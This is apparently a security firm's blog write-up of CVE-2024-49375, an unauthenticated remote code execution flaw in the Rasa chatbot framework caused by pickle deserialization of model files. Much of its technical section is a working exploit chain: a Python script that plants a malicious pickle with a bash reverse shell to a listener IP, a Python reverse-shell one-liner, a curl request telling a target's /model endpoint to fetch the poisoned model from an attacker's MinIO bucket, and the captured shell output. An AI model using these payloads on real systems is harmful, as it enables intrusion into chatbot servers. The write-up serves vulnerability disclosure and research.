Introduction

In the rapidly evolving landscape of artificial intelligence and chatbot technologies, security vulnerabilities can pose significant risks to organizations worldwide. One of such critical vulnerability that has garnered attention is: (un)authenticated Remote Code Execution (RCE) flaw in Rasa (CVE-2024-49375), a popular open-source conversational AI framework.

This vulnerability allows attackers to execute arbitrary code on affected systems without requiring authentication, potentially leading to complete system compromise, data breaches, and unauthorized access to sensitive information. The severity of this issue cannot be overstated, as it affects organizations that have deployed Rasa-based chatbots in production environments.

At Hakira, our commitment to identifying and mitigating security threats has led us to discover this vulnerability during one of our routine security audits for a client. Through comprehensive penetration testing and security assessments, our team identified the presence of this critical flaw in the client's AI chatbot infrastructure, enabling us to take immediate remediation steps before it could be exploited by malicious actors.

In this article, we will delve into the technical details of the Rasa (un)authenticated RCE vulnerability, explore its potential impact on organizations, discuss the discovery process during our security audit, and provide actionable recommendations for securing AI chatbot implementations against such threats.

Discovering the Vulnerability: The Journey Begins

Our security assessment began with what appeared to be a routine endpoint discovery. During our reconnaissance phase, we encountered an endpoint that responded with a simple yet revealing message: Hello from Rasa: <version>;. While this might seem innocuous at first glance, it immediately caught our attention as it disclosed both the presence of a Rasa instance and its specific version number.

This discovery prompted us to dive deeper into the Rasa API documentation to understand what functionality might be exposed. What we found was particularly interesting: Rasa offers a configuration solution that enables a REST API for model management and interaction. This REST API, when enabled, provides various capabilities for managing the chatbot's behavior and underlying models.

The Critical Endpoint: /model

As we explored the API specification further, one particular endpoint immediately drew our attention: the /model endpoint. According to the documentation, this endpoint can be used to replace the currently loaded model in the Rasa instance. This functionality, while useful for legitimate model updates and deployments, presented a potential security concern.

The significance of this endpoint became clear when we considered the nature of machine learning models in the context of security. Through our research and prior knowledge in the field, we were aware that machine learning models, particularly those serialized using certain formats, can potentially be leveraged to achieve code execution on the host system.

This realization transformed what started as a routine API exploration into a critical security investigation. If the "/model" endpoint was accessible without proper authentication, and if we could craft a malicious model that would execute arbitrary code upon loading, we would have discovered a severe Remote Code Execution vulnerability.

Setting Up the Test Environment

Rasa provides both a professional version and an open-source version. Our tests and review was conducted using the open-source version of "Rasa 3.6.20". To replicate our testing environment and verify the installation, the following commands can be used to set up a dockerized version of Rasa 3.6.20:

1~$ git clone <https://github.com/RasaHQ/rasa.git>; cd rasa; git checkout tags/3.6.20
2~/rasa$ make build-docker
3~/rasa$ docker volume create rasa_app; docker run --name rasa --rm -it -v rasa_app:/app -p 5005:5005/
4tcp rasa:localdev init --no-prompt

After executing these commands, you can verify that the Rasa bot was installed successfully by accessing the following endpoint:

curl <http://localhost:5005/>

This should return a response similar to "Hello from Rasa: 3.6.20", confirming that the instance is running and accessible.

Understanding the Model Generation Process

When Rasa completes its initialization process, it automatically generates and saves a trained model with output similar to: Your Rasa model is trained and saved at 'models/20250129-133851-corn-burmese.tar.gz'.

Once the containerized Rasa instance is operational, the model file can be extracted from the container to the host system for analysis using the following command:

1~$ docker cp rasa:/app/models/20250129-133851-corn-burmese.tar.gz rasa
2-model.tar.gz
3~$ mkdir rasa-model; tar -xzf rasa-model.tar.gz -C rasa-model; cd rasa
4-model

After checking the model, it contains many types of files, but one of them deserves our attention and its .pkl files which stands for pickle file in Python

Pickle Documentation

Warning: The pickle module is not secure. Only unpickle data you trust.
It is possible to construct malicious pickle data which will execute arbitrary code during unpickling. Never unpickle data that could have come from an untrusted source, or that could have been tampered with.
Consider signing data with hmac if you need to ensure that it has not been tampered with.
Safer serialization formats such as json may be more appropriate if you are processing untrusted data. See Comparison with json.

Throughout the Rasa source code, the string .label_data.pkl appears in several locations. A closer inspection of the file "rasa/core/policies/ted_policy.py" reveals a function called "pickle_load" that opens files with this particular suffix and passes them as arguments to pickle.load.

1~/rasa$ cat rasa/core/policies/ted_policy.py | grep .label_data.pkl -
2B2
3		)
4		rasa.utils.io.pickle_dump(
5			model_path / f"{model_filename}.label_data.pkl",
6--
7		)
8		label_data = rasa.utils.io.pickle_load(
9			model_path / f"{cls._metadata_filename()}.label_data.pkl"
10
11~/rasa$ cat rasa/utils/io.py | grep pickle_load -A9
12def pickle_load(filename: Union[Text, Path]) -> Any:
13		"""Loads an object from a file.
14
15		Args:
16		filename: the filename to load the object from
17
18		Returns: the loaded object
19		"""
20		with open(filename, "rb") as f:
21			 return pickle.load(f)

A straightforward Proof of Concept demonstrating code execution via Python’s pickle module can be created with minimal effort. In the first we verify whether arbitrary code execution becomes possible when a model file is maliciously modified. The method "TEDPolicy._load_model_utilities" is responsible for deserializing ".pkl" files, including the file that ends with ".data_example.pkl", as referenced in "rasa/core/policies/ted_policy.py"

rasa/core/policies/ted_policy.py

1@classmethod
2def _load_model_utilities(cls, model_path: Path) -> Dict[Text, Any]:
3		"""Loads model's utility attributes.
4		
5		 Args:
6		 model_path: Path where model is to be persisted.
7		 """
8		 tf_model_file = model_path / f"{cls._metadata_filename()}.tf_model"
9		 loaded_data = rasa.utils.io.pickle_load(
10				 model_path / f"{cls._metadata_filename()}.data_example.pkl"
11		 )

Pickle Deserialization with simple bash reverse shell inside PoC (Proof of Concept)

1import pickle
2
3payload = f"import os;os.system(\\"bash -c 'bash -i >& /dev/tcp/<LISTENER_IP>/1337 0>&1' &\\")"
4
5class EXEC:
6	def __reduce__(self):
7		return exec, (payload,)
8
9open("rasa-model/components/train_TEDPolicy3/ted_policy.data_example.pkl", "wb").write(pickle.dumps(EXEC()))

If reverse shell with bash not valid working, defientley should be used python reverse shell as it will be on system where Rasa run for sure: python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("<LISTENER_IP>",<LISTENER_PORT>));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("sh")'

So far we identify vulnerable part and have PoC exploit to gain RCE(Remote Code Execution) with reverse shell on system, but what about remote exploitation of it, how attacker can threat this malicious model archive to Rasa? And here we came back to found /model endpoint identified in recon phase

Rasa also allows specifying a remote location from which the model can be retrieved. Supported storage options include AWS, GCP, and Azure. Since I preferred not to depend on cloud providers during exploit development, I opted to use MinIO - a self-hosted, fully S3-compatible storage solution.

Since we are all hands plan for successful exploitation is: Generate a manipulated model file that demonstrates the possibility of remote code execution > Upload the model to our MinIO bucket > Tell Rasa to get the malicious model (/model) > Enjoy the RCE

1~$ curl -s https://<TARGET>/model -X PUT -d '{"model_server": {"url": "http
2://<MinIO_server_location>/<MinIO_bucket_name>/99991231-133700-rcetest.tar.gz"}, "
3remote_storage": "aws"}'

1~$ nc -vnlp 1337
2Listening on 0.0.0.0 1337
3Connection received on <REDACTED> 37808
4rasa@<REDACTED>:~$ id
5id
6uid=1001(rasa) gid=0(root) groups=0(root)

After this steps we able to see proof that RCE is worked and rev shell was back to listener.

At this stage we do have an unauthenticated RCE under certain conditions. The RCE vulnerability affects systems running Rasa as follows:
• Default configuration: not affected by RCE
• HTTP API enabled (--enable-api): affected

And vulnerable versions:
rasa (pip) <3.6.21
rasa-pro (pip) <3.10.12, <3.9.16, <3.8.18

The vulnerability have CVE-2024-49375 number and CVSS score 9.0(Critical)

https://nvd.nist.gov/vuln/detail/cve-2024-49375

Conclusion

The Remote Code Execution Critical vulnerability in Rasa (CVE-2024-49375) uncovered during our recent security assessment once again highlights how a single insecure component, such as unsafe model deserialization, can escalate into a full compromise of an AI-driven platform. As organizations increasingly integrate machine learning systems into their workflows, the security of these models and their loading mechanisms becomes just as critical as traditional application security.

Our experts team identified this issue during recent audit and help strengthen the overall resilience of the ecosystem. This finding reinforces an important message: complex threats often emerge from subtle implementation details, and only systematic, in-depth security testing can uncover them before attackers do.

At Hakira, we specialize in detecting precisely these kinds of high-impact vulnerabilities: logic flaws, chained attack paths, insecure integrations, and emerging risks in AI/ML pipelines. Through comprehensive penetration testing, secure architecture reviews, and continuous security support, we help organizations prevent critical incidents before they materialize.

Securing modern platforms requires expertise, creativity, and real-world experience. Our team remains dedicated to staying ahead of evolving threats and ensuring our clients’ systems stay protected, resilient, and ready for the future.

When Your AI Turns Against You: Rasa RCE Vulnerability

Hakira